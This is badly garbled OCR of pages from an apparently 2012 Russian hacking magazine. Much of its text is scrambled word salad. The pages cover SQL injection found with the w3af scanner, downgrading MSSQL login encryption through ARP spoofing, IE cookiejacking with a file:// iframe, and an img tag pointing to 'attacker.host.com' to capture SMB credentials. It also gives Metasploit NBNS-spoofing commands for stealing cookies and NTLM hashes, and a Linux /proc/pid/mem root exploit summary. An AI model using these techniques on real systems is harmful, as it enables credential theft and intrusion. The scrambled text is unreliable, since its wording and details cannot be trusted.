cURL, Wget, Python + urll ib,

:1- выбирай, ч т в рассуждении пуще до душе. В wЗaf про сего

предусмотрены специальные удобные инструменты. П ослать пачку однотипных НТТР-запросов вместе с разными значениями одного изо пара­

метров? Пожалуйста! Генерировать соответствующие токены можно на томище но Pythoп. С через редактора НТТР - запросов, во котором есть аж простая п одеветка НТТ Р - синтаксиса, позволительно отправлять одиночныезапросы . Ч астовозникаетнеобходимостьвыполнить

Пол у ча е мш е лл че р ез S QL-инъекцию

шифровка который строки во

URL тож прямо-таки вычислить МО5сумму. Конечно, дозволено ахнуть неграмотный успеешь накопить «echo -п "admin" 0 md5sum>>

:1 Как твоя милость поуже дога­

на консоли, а утилизировать на сего замонтированный шифровальщик немно­

Бинго! Обнаружена классическая SQ L-инъекция .

го удобнее. П ри раскрутке на очереди незрячий SQL-инъекции имеет большое значение

дал из моя персона , эт по отношению з апускаются всё те а плагины, которые твоя милость выбираешь быть

разграничивать посередь на вывеску ответы веб-сервера , пользу кого что-что тебе жив не буду

об ычном ск анировании.

пригодится вделанный

diff.

Для поиска «слепых>> из кулей как и глотать специальные плагины. Вы­

Ну равно наконец, разве твоя милость « вайтхат >> не в таком случае — не то про­

сто ревизор безопасности, ведь заказчику пентеста приходится объединение казать, вроде

ключим выход ошибок во настройках РНР равно попробуем задетектить т через

«работает»уязвимост~используявозможностьзкспортазапросов

ж е ба г, только поуже вслепую. С через НТТР-редактора посылаем пару

во форматы

з апросов для нашему веб-приложению: /useг-info.php?id=1 да /useг-info.

Python. Иными словами , допускается сказать: «От­ на жмите .. Сабмит " равно смотрите, в духе появляется

HTML, AJAX

кройте вишь эту форму,

да

p h p? id=1 % 0Ы , а дальше передаем р езультаты средству к сравнения тра нз акций. В результате возле вып касательно лн е нии SQL-зaпpoca срабатывает

JS-сообщение ... >>

пр ос тейшее алгебраическое выражение, равным образом пишущий сии строки получаем пара разных

Р ассмотрим типич н ый план использования сих инструмен­ тов . Запускаем прокси равно шаримея до равным образом со следуемом у веб-приложению

отв е та [информация дл ваш покорный слуга р а зны х польз в отношении вателей!. Дальнейшим медленный

[не забываем подсоединить проксирование трафика на светильник у зереl.

м ож ет не без; преступник всё та а э кс пл у атация от ко ули .

На вкладке Histoгy видим отображаемый во реальном времени НТТР­

OUTRO

движение посреди браузером равным образом сервером. В случае со побольше мощным при­

ложением, как-то чатом , транзакций короче гораздо больше.

WЗ af- сие действительн что касается могучий фреймворк на тычина т ирования

В этакий ситуации что не дозволяется впору склифосовский благонравный фильтр : от его

б ез оп не без; так от ти веб-приложений . Рас со казывать по части нем дозволено протяжно ,

через можно, ко примеру, строить умозаключение только лишь транзакции из такими за­

п об этом у пишущий эти строки ставил пред не без; относительно б касательно й задач у сообразно показывать его на действии.

просами, которые содержат границы во строке << Запросы>> равно получи и распишись кото­

Важно, аюшки? сие далеко не прос т об следующий скэнар безопасности, а особенно

рые был получен 0хх-й ответ.

фр е ймворк, большое состав дополнений тому доказательство. К тому ж е к человека , получи базовом у ровне знающего веб равно

Вернемся для нашему приложению. Во эпоха навигации сообразно нему

Python,

замечаем, сколько подле наведении сверху аватар пользователя появляется

неграмотный со ставиттруда примолвить недостающий функционал либо — либо проверку.

всплывающее «окно>> вместе с информацией об этом пользователе. Эта

К из тати , наравне да любому свободному проекту, wЗaf нужны новые раз­

новость выдается во результате как всегда го АJАХ-запроса для

ра б отчики, тестировщики да без труда активные пользователи. Кого

/useг-info.php?id=1, зачем будто во истории запросов . Давай протести ру­

з т касательно з аинтересовало, услуга nожаловать во подходящий ведомость

ем сей скрипт получай уязвимости. Для нашего запроса во карточка выбираем

рас со ылки [ wЗ af . souгce f oгge . ne t l либо возьми IRС-канал #wЗaf во бредень

«Audit

гequest

with ... >>- нас

интересует, принимать ли после этого SQ L-инъекция .

Fг e enode. ::х::

ld:47

ld: 06

LАутентификация J

~~-----..

[ Сбор ссылок

GЕТ http :/Jloca.lhost /u ser - i n fo .~p 0id-1 НТТР/1.1

~

Accept -l.angu•: en-us,en;q-e.s Accept-encodi ng: identity Keep-alive : 015 Accept : text/htlll, арр lication/xhtlll+XIIl, арр licat ion/XIIl: q..e. 0

user-agent : Нozilla/S.e (Xll; Linux i686; rv:2.&.1) Gecko/Z81 Accept -charset : IS0-8859 - l, ut f -8; q-e. 0, • ;q-e. 0 Нost: localtюst

Refe re r: http://localhosttindex.php Cookie: PНPS ESSI D-гf 0vdbs j ist7is3j6 rlc3p462S

Proxy- connect i on; keep- а li ve

~GЕТ h t tp ://loc al ho s t t u ser- in fo. php 0id· 0~Bl НПР/ 0 . 0

Accept- l anguage: en-us,en;q-e.S Accept-encoding : identity Keep-alive: 015 Accept: text/ht.l,application/xhtii\+XIIl ,application/xlll ;q..e. 0 , .-, . ;q-8.8 User-agent: t10zilla/S .8 (Xll ; Linux iб86; rv:2.8. 0) Gecko/28118438 Firef o Accept -charset: IS0-88S9· 0,utf -S; q-8. 0, • ;q-e. 0 Нost: localhost Referer : http://l ocalhos t /index. php Cookie: PНPS ESS I D• rf 0vdbs j ist7 is З jбrlcЗp462S Proxy-connection: keep-alive <style>

<style>

"' (height:

"'( height :

ерх; Ьorde r : 0рх; Ьorder-top:

</ style> <tаЫе Ьo rde r- " 0 "

<tа Ые Ьогdег-· е· из е\ \sp<~c i ng- " S " c\ass-· userТaЫe">

~ <1: Г><t d> Fi rs t natlf!: </td><td>Jaii'IE!s</td></t r> <t r><td>Las t na~~e : </ td><td>Bond</ td></ t r> <tr><td colspan• "2"><hr />1 like Vodka ... shaken not stirr <t r><td co\s an•"2 "><hr /><а href• "/IIIE!ssages .p_h ?to•jai'IE!s </t r> </table>

0Sellext lo compare J

ХАКЕР

03 / 058/ 00 02

Ipx solid gray;

0

0 </sty\ e>

Модель работы разряд да зуд для ого ск анера уязвимостей веб - прило ж ени й

ерх;

Ьorder: ерх; Ьorder-top:

l px solid gray;

~

cell spacing•" S" cla s s-~ us e rТaЫ e "> <tr><td>Firstnane: </td><td>A\isa</td></ t r> <1: r><td>Las tnaii'IE! : </td><td>Se lezneva</td></t r> <tr><td colspan•"2"><hr />Spacegir\1 J! !</td></tr> <tr><td cols an•"2"><hr /><а href• " /IIE!ssages . ~h~7to-alisa " >Send Priva </ t r> </tabl e>

[<lo::J o12

Утилита равно з поезд а wЗ af для того сравнения НТТР-т ранз акций

051


ВЭЛОМ/ЕАSУ НАСК

Лёша «GreenDog » Тюри н, Digital Security ltwitter.com/antyurinl

ОТСНИФАТЬ ПАРОЛЬ ПРИ АУТЕНТИФИКАЦИИ В

MSSQL

Ef.3Jf..i!f.·l ъ--

Microsoft SQL server- сие

одна изо самых распространенных СУБД.

0.

Шифрование русским языком , хотя отключено:

ENCRYPT_O FF- ОхОО. ENCRYPT_ON - Ох01. ENCRYPT_NOT_S UP - Ox02 .

Шифрование общедоступно равным образом включено:

З.

Шифрование недоступно:

Как да многие некоторые провиант

Microsoft, SQL server предлагает два вида аутентификации : integrated [sign-on], ведь лакомиться аутенти­ фикацию п что до виндовой у ч етной записи, да native, в таком случае глотать классиче­

0.

Шифрование требуется: ENCRYPT_REQ-OxOЗ.

скую, сообразно логину равным образом шаг ролю. Оба способа используются порядочно

тря получи и распишись название, зашифрование быть таком значе нии используется,

часто.

хотя только лишь с целью процесса . А чисто эпизодически стоит только

По дефопту данные, передаваемые в области сети, по существу

зашифрование невыгодный используется совсем. Таким образом, ты да я совершенно

невыгодный шифруются. Если точнее, в таком случае шифруется тяжба аутентифи­

можем осущест скручивать классическую МiТМ-атаку и, подменив исходняк

кации пользователя, а самочки данные- нет. Конечно, про атаки

просто-напросто всего лишь на одном жете кете, без остатка отключить зашифровывание

сего было бы достаточно. Зачем нам логин равным образом танцевальный шаг роль, даже если я

равным образом отснифать аутентификационные данные.

Давай рассмотрим двум ее особенности.

0.

0. 2.

г

По дефопту устанавливается значительность

ENCRYPT_O FF.

Несмо­

ENCRYPT_NOT_SUP,

Кстати, либреттист сего исследования довел всё до самого логического

можем получи лету переменить запрашивание либо получитьданные , всего делов всего лишь

устроив arp-spoofiпg среди сервером равным образом клиентом? Затем, почто сие

конца - создал устройство с целью

безграмотный самое относительно стое мастерство - заменять в некоторой степени нате лету. Поэтом у по­

вслед за нас равно сделает. Только , думаю, з десь целесообразно обозначить одну особен­

Metasploit Framework,

тот или иной всё

ность. В описываемом случае устройство отнюдь не меняет эмпирика бери парение у,

пытаемся вытащитьлогин равно пароль.

а поднимает ТСР-порт, равным образом всего лишь не без; него причина редиректятся

Не что-то около искони неизвестный по-под ником fOrki изучил настоящий вопросительный знак [!J.i.LЬ'L s8g07r l. Посмотрим, ась? но возлюбленный выудил. Дл ваш покорный слуга основные принципы то, что-нибудь дан­ ные MSSQL передаются на вид т е Tabular DataStream protocol

в MSSQL-cepвep ради вычисление покамест одного соединения, созданного уже атакующим, что, тем отнюдь не менее, отнюдь не создает особых проблем. Всё, что-нибудь

требуется, - з т об основать редирект трафика, приходящего

[ bit . ly/z З oVPR I. Н по отношению самопроизвольно таковой пр отокол малограмотный поддерживает шифрова­

получай хост атакующего впоследствии arp-spoofing-aтaки, сверху согласующий

ние . Как но так? Откуда зашифрованные п акеты авторизации?

местного характера порт. Но да эту после дачу

После непродолжител ьны х мучений от

во личный часть куцый shеll-скрипт.

Wireshark fOrki

обнаружил

автоматизировал, добавив

fOrki

вдоволь интересную вещь: ради шифрования тогда использу­

ется нормальный

SSL [с самоподписанным сертификатом], который TDS . Нестандартное решение. Но сие неграмотный этак

-----

-

- -

--

-

-

~--------

работает вн утри

важно. Самое интересное- сие отрегулирование ТDS-соединения, так называемого пакета

PRELOGIN . Он

-

-----

задает разнообразные

настройки да во книжка числе указывает, хорош ли использоваться шифрование. За зашифровывание отвечает поле рое может думать сле д ующие значения:

052

- - -

ENCRYPTION,

кото­

------------

-

-

- - - -- - - - --

Выбор метода в основании флагов, установленных у клиента равно сервера

ХАКЕР

03/158/2012


EASY

УГНАТЬ КУКИСЫ С ПОМОЩЬЮ

UI-REDRESSING

НАСК

......... ·Jйи г

В декабрьском номере][ пишущий сии строки познакомились не без; такого типа вещью, в духе

clickjacking.

насчёт -·

Сrатья была очен ь полезной, однако либреттист далеко не упомянул об

одном замечательном трике. На самом деле наименование

т

~ Р - ~ - G~ ·

Adcms iQ c:'iOocunert:sns.ttnat~

clickjacking ui-

невыгодный решительно в точности отражает секрет атаки, равным образом ми кажется, сколько

сие паче правильное nонятие. И мастерство , которую ваш покорнейший слуга

redressing -

.,_

опи ш у ниже,- самое яркое т ому подтверждение.

Итак , n озволь нарисовать тебе технике рассказал

cookiejacking. Впервые об этом Rosario Valotta сверху HITB на Амстердаме во 0011

0iS9l003 .Z<19775128.132514ИЭ9 .132 . account.в .9CJ09le. соа/ >600

году. Потенциал техники огромен- nросто до от тавь , что-нибудь не без; ее по­

088086656

мощью дозволено nо хи тить куки с люб по отношению го овраг та , даже если через защищенно­

ll3080 0SS Z

00191238

го НТТРS-протоколом! Однако на этом месте лакомиться небольшее усечение :

работает симпатия только лишь во

по отношению

D

IE !но зато закачаешься всех версиях! . Теперь ну-кася

Во-первых, дьявол использовал

IE.

0-day,

которая не без этого кайфовый всех

С виду сие неграмотный такая быстро равным образом со трашная дырка, а впоследствии у ее

неграмотный в особицу стремились пропатчить. Как твоя милость сейчас знаешь, на

st..edDotunerts

~ Мy((ЩIII:et"

_,;j...,__."""

посмотрим, который а п редлагает нам сей И Б-специалист.

версиях

.....- .

IE

Об х од кр осс- зон а й политики да ход для локальным кукисам изо зоны инет

лакомиться

узлы. В разных зонах действуют различные настройки безопасности.

Rosa rio сие мячик! на другой !сетка!. Под мячик я прячем выше- iframe от кукисам и, а получай самом

Н аn ри мер, описанная перед этим автоматиче ска моя особа NТLМ-а утентфикация

сайте создаем обрабатыватель на переносимых данных. Н что до равным образом сие до настоящий поры

такая фича, наравне разобщение возьми зоны:

д ейст вует дл автор уз вылавливание зоны

lntranet

lnternet, lntranet,

доверенные

равно выше. Вот сnисок зон, отсо­

- переволочь безраздельно устройство !в прообраз е

малограмотный всё . Нашему

iframe

я добавляем описатель

scrollspeed

из большим

значением. Это делать нечего к того, воеже клик, совершаемый

ртированных во nорядке уменьшения привилегий:

пользователем, превращал ся во по отношению перацию отделения после число отсчетов само­

стоятельного перемещения lпроскролливанияl

Local Machine Zone Local Intranet Zone Trusted Sites Zone Internet Zone Restricted Sites Zone

iframe с самого

верха на самы й низ. Таки м образом, получается, что-то юзер во время камарилья получи и распишись самом деле выделяет шрифт в мячик на корзину, перемещает сие т стихи

iframe, а перемещая drag & dгор'ом, во итоге пере­

давая конферанс хакеру. Возможно, ась? для словах всё сие красиво невыгодный очень понятно, же на правах всего твоя милость посмотришь видео получи и распишись сайте

Rosario Valotta

С без п мастак н ос т ью да зонами связан единаче единодержавно момент- миропонимание

I Ьit .l y/iN xvT Ь) , так одновременно поймешь логику метода и, на частности, техни­

кросс-зон ног об взаимодействия. Согласно самому общему прави­

ки сопtепt extractioп, хоть кабы твоя милость отнюдь не наслышан со

не без; побольше привил егированной . Та ким образом, извещение заключение

<iframe

JavaScript.

Думаю, который нынче проститутка концепция атаки ясна . Однако у нее лакомиться

лу, ме н ее привил егирован н а моя персона зо держи н е может взаимоде йствова ть

мало-мальски нюансов. Во-первы х, сия форсинг работает нате всех ОС

кук и. Таким образом, получи стра книзу у сайта зоны всемирная паутина дозволительно

Windows, ась? да создает проблему :1. Файлы кукисов на ХР равным образом в Vista/7 лежат во разных местах . Для ХР сие C: //Documents and Settings/%user_name%/Cookies, а в целях паче новых версий винды -C: /Users/% user_name %/AppData/Roaming/Microsoft/Wi ndows/ Cookies. Тем безграмотный менее, э т а « вопрос » решается порядочно просто,

встав ить вместе с стамуха ую щий фрейм:

опять-таки квалифицированная браузеров отправ л яют во каждом из-за пр осе заголо­

src="file: // c :/boot . ini " >

со страницы зоны интернетприведет

ко ошибке дост у па. Уязви мость

0-day

состоит во том, что такое? кросс-зонная стратегия

малограмотный действует в целях оnре д елен ны х файлов, а то есть на файлов

вок User-Ageпt, который-нибудь архи нередко содержит на себя равно версию ОС.

<iframe src="file :///C: // Documents and Settings / %user_name%/Cookies " > </iframe>

Кроме того, к опре дел ения версии ОС допускается использовать в своих целях тем же

JavaScript.

Во-вторых, равно как твоя милость , ваш покорнейший слуга д умаю, заметил , нам делать нечего

смыслить наименование пользо вателя возьми его компьютере, равным образом сие главная про­

Здесь % user_ пame % - сие фамилия пользователя во ОС. Куки а

блема. Для ее решения не грех попробовать понудить пользователя

у каж дог об п по отношению ль зователя свои, п оэ ведь му хра нят ся они во личных п ап­

присоединиться за протоколу

ках . Пр равно мер, иллюстрирующий читание кукисов

передает название пользователя одинаково не без; другими полями. Дл ваш покорный слуга сего

Google,

твоя милость сможешь

SMB.

Пр равно подключении соответственно н ему потребитель

получи и распишись ядовитую страни ц у необходимо приплюсовать чисто такого склада упрощенный

уви подевать сверху скриншоте.

Во-вторых , за вычетом 0 -d как кормилица языком слизнула - бага, либреттист использовал специальную

extraction lпредстав ­ лена П олом Стоуном сверху BlackHat Europe - 0010, goo.g i/ZBYNw l. Зачем? Хо тя наша сестра равным образом подгрузили на iframe обложка из кукисам и, всё же

кoд:<img

технику clickjackiпg·a подо названием conteпt

src=" \\attac ker.host.com\ any . jpg" ></ img >.

Конечно, снова потребуется доставить возделыватель запросов

нате

045

порт, а по прошествии времени основать его связь вместе с wеЬ ­

сервером. Как видишь, растолкованный рецепт без затей шикарен! Однако

унаследовать д ос т у п ко данны м во н ем я безвыгодный можем. Здесь д ействует

потенциал е г об использования чаще общей сложности огра н ичивает филь­

кросс-д омен ная стратегия , фактически свой сайт находится грубо на сети,

трация такого трафика получи сетевых устройствах . К тому но з д есь

а во

встает до этот поры одна проблема. На дворе уж кострома 0012-го, а

ifram e у

нас сидит

localhost

пользователя.

Суть этой специальной т ех ники стоит проста. Все совре ­ менн ы е браузеры поддерживают

drag & drop,

вместе с п омощью которого

пофиксила у язвимость на

Microsoft

IE

Microsoft

до этих пор во начале осени 0011-го. Кроме того,

внесла изменения во шапка кукисов во файловой

ламер может выпить до дна чашу эмпирика из в рассуждении дног касательно сайта возьми др угой .

системе. Теперь их названия лишились п что до н ятного удобочи т аемого

Таким об ра зом, Юзеф е р , сообразно сут да , копирует данны е на относительно дн ом месте

вида user_пa meradomaiп[couпter].txt равным образом от т разве похожи получи буквенно­

да вставляет во другое . Кросс -дом е нным п олитикам з д есь привязаться

цифровые рандамы небось 07ТVLB D W.txt. П оэтому перейти для ним

малограмотный для чему. Так вот, сопtепt extractioп - это, элементарнее говоря , порядком

напрямую этак без затей еще малограмотный павел учи тся. Впрочем, сообразно статистике,

искаженный

весть малое состав поль зователей загодя обновляет

drag & drop. Заманив

получай обидный clickjackiпg-caйт

нашу жертву, да мы от тобой предлагаем ей, например, помузицировать на игру. Ее содержание

ХАКЕР

03/158/ 00 02

не без; вои браузеры, особенно если бы говор подходит об

IE.

053


ВЗЛОМ/ЕАSУ НАСК

СОБРАТЬ ИНФОРМАЦИЮ РЕШЕНИЕ

SkiJJ Tracino Framework

Сбор информа ц ии яв л яется относительно д ним с важнейших этапов рядом про­

;\ ' Ift'(' '•\ , 0 0 \

l

J(r~>r

,J 0'l tlll , ' ' , о..; 0'1,

.. t l

"it .._

ведении ауДита без п аснос т равно lну иначе атаки). Ведь нам необходимо найти самое слабое поприще да спустя время попробовать завладеть от него всю систему. Но на какого хрена иска т ь трудный путь, если бы самым слабым местом любой, аж самой защищенной системы является чело­ век? Ты во который бы так ни стало знаешь что касается существовании экой замечательной

DNS command Une

вещи, равно как социальная инженерия. Е е действительность напрямую

***'*

WeЬsfte

зависит через доступной информации относительно человеке, почему тысячи

*** IPNelghЬors

специалистов да проводят отличаются как небо и земля исследования сверху эту тему.

***,

Однако на России экой т ен д енции на срок почто малограмотный наблюдается, где-то

Spamllsts

***•

на правах наши пользователи си д моя особа т на основном всего-навсего на Одноклассниках

MaШngllsts

равным образом В Контак т е, д а равным образом для ц есс информатизации снова прямо-таки неграмотный доше л

***

DNS lnformetion Gathering command line • Flen:e Domllln scan i:J

****; **** • DNSEnumtooi GI ***i • S dlg ~ns.domaln .com domaln.com AXFR ***

• The Н.rvester comm.1nd llne tool Q

Q

Machinespeclflc

накануне большинства ведомст на . В любом случае ваш покорнейший слуга думаю, ась? тебя за­

интересует справка

lntorm•tlon

tools

***;

makensi .es/stf. Автор этой страницы невыгодный поле­

нился составить во одном месте никак не плохую коллекцию всевозможных онлайн-сервисов, которые могут сослужить службу тебе во процессе взлома или — или пентеста, с намерением извлечь всю необходимую информа­ цию что в рассуждении человеке, где-то равным образом что до всей подопытной системе.

О nреде nя ем nлаги ны

WordP res s

НАЙТИ АЛЬТЕРНАТИВУ DNS И ПРОСПУФИТЬ NETBIOS

li•iaf..i!!f.ll т ·лw т

е со ли во файле пропал nри вязок, производит вопрос ко D NS - cepвepy. За ­ Всем нам известно, ась? чтобы определения IР-адресов объединение именам

те м

используется документ

Здесь должно уточнить, ась?

тревоги насчёт безопасности !тогд а существовали побольше важные зада­

NetBIOS Name Seгvice. NetBIOS входит во Windows в соответствии с дефолту, а NetBIOS Name Seгvice INBNSI- сие оный а протокол, всего только

чи), оттого во сегодняшний день сезон на нем вкушать куча недостатков

предназначен симпатия к установки соответствия в кругу NеtВIОS­

от точки зрения безопасности . Однако нате смену ему согласен

именами равным образом IР - адресами. В процессеработы настоящий документ либо

ONS.

Протокол проектировался минуя особой

DNSS EC,

Windows

использует такую штуку, что

равным образом моя персона надеюсь, сколько си т уа ц ия изменится на лучшую сторону. Сами не­

использует специально предназначенный WINS-cepвepa, либо отправляет широко­

достатки

пророческий вопрос во вентерь !думается, об эту пору тезис атаки понятна).

DNS

самый чрезвычайно проявляются во локальных сетях,

Но вернемся для до текущий поры одному важному моменту- D NS-зanpocy

особенно буде автор можем прово д ить атаки подобно aгp-poisoning, позволяющие п росматривать да мо д ифицировать трафик, которым

ко серверу. Если сервер ответит пользова т елю, так вслед п рос соответственно

обме н иваются жер т ва да се рв е р . Н по отношению д авай предположим, ч т по отношению

поуже безвыгодный короче отправлен . А во вкусе но DNS-cepвepy н е ответи т ь, нашел л равно

NBNS

за каким-то п ричинам всё э т по части нам невыгодный д оступно, пускай бы ты да я равным образом находим­

увлекающий пользователя сайт ХХХ.СО М равным образом м ее т ОN S-за п ись?

ся на одной лока л ке из жертвой . П усть, например, во сетке при­

Здесь наш брат можем ухватиться возможнос т ями современных

сутствует некая

браузеров : поиском изо адресной строки да подстано во который доменов

005,

да автор совершенно далеко не хотим, дабы кто-нибудь заметил

нашу хакерскую предприимчивость . Тогд а нам нужно работать тихо,

верхнего уровня

используя исключительно трио д артные потенциал протоколов. Уточню

привыкают впрыскивать то, что такое? их интересует, непосредственно на а д ресную стро­

l.com,

.гu) . Как именно? Сейчас пользователи

задачу. Нам надо навернуть куки, передаваемые пользо­

ко у, так браузеры безграмотный денно и нощно могут понять, хочет ли ламер

вателем получи и распишись философичный сайт ХХХ.СОМ. Изначально может пока­

черт знает что раскопать во поисковике либо — либо несложно вскрыть сайт. Е от т ь, конечно,

заться, в чем дело? поручение невыгодный имеет решения, да ну-ка рассмотрим, каким

определенные паттерны !например, пробелы во адресной строке),

образом ОС

Windows

а намного чаще браузерыв первую цепочка резолвя т отчество токмо

определяет IР-адрес сайта. Первым делом

построение проверяет статическую привязку

IP для

упомянутым больше способом . Что до этих пор интересней, присутствие отправке

именам, хранящим ­

ся на файле hosts IC : \Windows\System32\dгiveгs\etc\hosts). Д алее,

• FiltEr: J(chs ог No.•

' 1,..

Заnрос

051.

.

08313 . 063879 485 03 . 086589 493 03 . 00'3700 494 03 . 005520 528 04. 05 0488 570 05 . 005637 URL во

...

nros ) and ip.addr

0 Time

0Destnation

0Source ~

DNS-зanpoca ко введенной пользователем строке добав л яется

0 123 2 123 123 123

=

Ejp'ession ... Cleat Арр!у 1 ProtDcol

023 2 123 255 255 255

ONS DNS DNS NBNS NBNS NBNS

lmro

. .. .

Standard query response_. NO such Standard query А makaka. stanoard query response, No such Name query NB МАКАКА<00 > Name query NB МАКАКА<00> Name query NB МАКАКА<00>

nате

nате

браузер е nоро ж дает nачку ра з личны х заnросов к резолва равным образом мени

ХАКЕР

03/158/2012


EASY

027 128 162 163 185 186 258 259 319

068.190841 368. 027678 423. 072957 423.407005 442.487183 442:734222 666. 050204 666. 081655 727. 067776

092.168.0.101 192. 068. о. 002 192.168.0.101 192. 068.0.102 192. 068. о. 001 192.168.0.102 192.168.0.101 192.168.0.102 192.168.0.101

092.168.0.255 192.168 . 0.101 192.168.0.255 192.168.0.101 192.168.0.255 192.168.0.101 192.168.0.255 192.168.0.101 192.168.0.255

NBNS NBNS NBNS NBNS NBNS NBNS NBNS NBNS NBNS

02 104 92 104 92 104 92 104 92

Name Name Name Name Name Name Name Name Name

query query query query query query query query query

НАСК

:00> NB ?? response NB 092.168.0.102 NB iiiliiiliiiliiil lliiilll RU<OO> response NB 092.168.0.102 NB .GOOGLE.COM<OO> response NB 092.168.0.102 NB .-RU<OO> response NB 092.168.0.102 NB AASDASD 0188RU<OO>

N B NS- cn yф ан r во д ейст вии

не вызывающий сомнений суффикс, на результате что стало быть полное до­

0.

Запускаем : run .

менное термин .

Вернемся для краже кукисов. Итак, используя NВNS-спуфинг, пишущий сии строки

Теперь нам ничего не поделаешь подделать опровержение возьми NBNS-зanpoc. Для этого нужен Tгansaction

00

можем сфальcифицировать какой-либо рандомный запрос. Но нам нужны

изо NBNS - зanpoca . Но , что сделано было

сказано выше, нынешний требование чаще лишь является широковещатель­

кукисы как не без; ХХХ.сот, а благодаря этому автор проворачиваем неболь­

ным, а этак что наша сестра находимся во пирушка но локалке , ведь никаких проблем

шой трюк- поднимаем веб-сервер со страничкой, содержащей

со его получением нет. К нашей радости, в целях спуфинга во

завуалированный структура !можно заюзать JavaScгipt) , а поуже во зто м фрейме

MSF поуже

nрисутствует годный модуль. Вот краткая план дей­

загружаем ХХХ.сот. Однако нам требуется далеко не просто-напросто найти работу ХХХ .

ствий:

сот, да сызнова да выработать так, так чтобы браузер безвыгодный есть его не без; через

0.

Загружаем модульдля Net BI OS-cynnингa:

use auxiliary/spoof/

0. 3.

0.

DNS

да начал истощить про поиска исключительно

NBNS.

Очень важнецки ,

с тем браузер продолжал расчислять просп уф ленный владение тем но

nbns/nbns_response. Выставляем регэпс ответов получи требования :

Set REGEX *google*. set spoofip xa.kep.

сам по себе ым доменом, иным способом во силу вступят кросс-доменные политики

равно никаких кукисо во пишущий сии строки далеко не увидим. Так что указанная методика

Указываем, который IР-адрес подставлять:

IP.add r ess.

разресерчивалась на правах в один из дней закачаешься промежуток времени написания сего текста, ведь

Зanycкaeм: run.

единственным достойным вариантом таким образом запрос ко н есуще­

Теперь сделаю небольшее отступление. Создатель сего моду­

Теперь м в отношении ж хотя изобразить общ да й алгорит м а таки :

ствующему поддомену атакуемого сайта.

ля ITiт целей

Medin) предлагал пустить в ход его целиком и полностью чтобы други х lgoo.gi/Jz2Q9), а не сколько иное к банального сбора NТLМ-хешей.

0. 2.

Поднимаем wеЬ-сервер от легированием входящих запросов

!чтобы соби полчище кукисы) да фреймом, ссылающимся получи и распишись несуще­

Е сли точнее, в таком случае затем запуска вышеуказанного модуля ото браузе­

ствующий поддомен ХХХ.сот !например , asdasdasd.XXX.coт ) .

ра приходит бездна запросов, п ричем чаще итого следовательно

спуфить короткие имена ! будто тakaka), а безграмотный длинные lтakaka. сот). С учетом логики работы Windows короткие имена причисля­ ются для зоне интранет !не интернетl). А сия сфера на IE будто « до­

Устанавли ваем NВNS-сп уфи нг сверху всё-таки имена.

0.

Жертва, которая ввела вещь во адресную строку браузера, спу­ фится в области

0.

NBNS равным образом

спуфится в соответствии с

веренной», равным образом на ней действуют несравненно меньше грозные настройки безопасности. К примеру, тогда разрешена автоматическая аутен­ тификация держи сайтах. Таким образом, автор сих строк можем лукнуть узел

0.

редиректится получи хостхакера.

Бра узер автоматом резалвит asdasdasd.XXX.coт, и, сызнова же,

NBNS.

Браузер касательно тправляет кукисы ХХХ.сот бери asdasdasd . XXX.coт, то есть бери хостхаке ра.

к сбора N Т LМ-хешей в соответствии с Н Т Т Р !хотя не запрещается равным образом объединение

0.

Загружаем модульдля

SMB): снифинга: use auxiliary/server/

Так им образом, автор сих строк можем выудить кукисы через множества сайтов. Ед инст венн ое предел после этого во том, чтокукидолжны

capture/http_ntl m. 2. 3.

Страница, идеже короче свершать ся запрос:

взяться установле ны никак не получай ко нкретный секция IХХХ . сот), а бери владение

Порт, идеже поднимется веб-сервер :

I . ХХХ.сот) .

set URIPATH . set SRVPORT ве .

ПЕРЕХВАТИТЬ ТРАФИК НА

LOCALHOST ПОД WINDOWS

ы.r.&~tfl г.

Недавно ваш покорнейший слуга столкнулся вместе с отнюдь не возможностью просмотреть пробка

настройки

сквозь прокси возле системных обращениях ко

прокси нате

-127.0 .0.1. Почему

localhost

системных? Потому, почто настройки

щиеся прокси , используются большинством ПО в мер,

Python

либо для л у пбзку

IE, касаю­ Windows. Напри­

возле использовании uгll i b2 автоматом беретик прокси

г

IE равно .NET fгатеwогk запрещаюттрафику переть через localhost равно 027.0.0.1 . В IE9 эту проблему посчастливилось принять решение

вслед счисление того , что такое? во настройках дозволительно прибрать опцию << никак не исполь­ зовать прокси>>-

<<-localhost».

Решение , на общем-то, сильно простое. Во - первых, дозволяется

ОС . Надо отметить, почто заостреннее итого п роблема проявляется,

управляться для сервису до любому

IP

нет-нет да и стервис поднят как держи внутреннем интерфейсе 0127.0.0.1) и недоступен сверху внешнем 00.0.0.0). В оный крат ми посчастливилось замыслить

хоть бы за адресу

в качестве кого безвыездно они относятся для одному

ее каким-то обходным толково , же как-то аз многогрешный наткнулся для инте­

резолва имен hosts l % windiг%\dгiveгs\etc\hosts) другое отчество для lo calhost : 027.0.0.1 localhOst .

ресный воздержанность во благе Eldaг Maгcussen. Он написал, что-то дефолтные

ХАКЕР

03/158/2012

г

027.1.2.3, круглым счетом

во

027

подсети, исключая первого,

интерфейсу. Во-вторых , позволено nрописать на файле локального

055


Павлуша Александрович [iv i nsi d e .Ы o g s p ot.com[

ВЗЛОМ/ОБЗОРЭКСПЛОИТОВ

Димуля Михайлович

[115612, дескать р. К рас н ая звездо ч ка, д . 0[

Обзор эксплоитов В этом интереснейшем обзоре да мы не без; тобой рассматри­ ваем свежую небезукоризненность во ядрах

Linux,

позво­

ляющую минуя особого труда увеличить услуги

0

Локальное увеличение привипегий во Linux

CVSSV2

0.8

0111111 011 0 011 01111

01 01 0 [AV: L/AC: L/AU:S/C:C/1 :C/A:CI

l:iil'II3] Уязвимость связана из интерфейсом /ргос/<РI 0>/mem [где <PID> идентификатор нужного процессаl, тот или иной Linux предоставляет

Microsoft Office да Acrobat Reader, а и ХХЕ-инъекцию на phpMyAdmin.

пользу кого открытый запи вместе с равным образом во кэш процесса равно чтения изо нее. В ядре версии

Не пропусти!

по от тат об чно защищен ото неавторизованного доступа не без; через

на системе, баги на

0.6.39 разработчики у брали директиву #ifdef,

исключающую прямую

копия на кэш процесса, так как сочли, почто данный интерфейс уже других ме х анизмов ядра. На самом деле nисать на реминисценция процесса мож е т произвольный пользователь, обладающий достаточными правами.

Как оказалось, сии власть проверяютсЯ невыгодный отнюдь корректно. В итоге пол у чило вместе с ыо , чтополучилось:вовсехверсияхядра,начинаяс

0.6. 09, злобно у мышл е нник может продвинуть до « карьерной лестнице» до рута любого имеющего от мы пользователя .

056

ХАКЕР

03/158/20 02


Обзор экс пло итов

цt:J4!·Jii

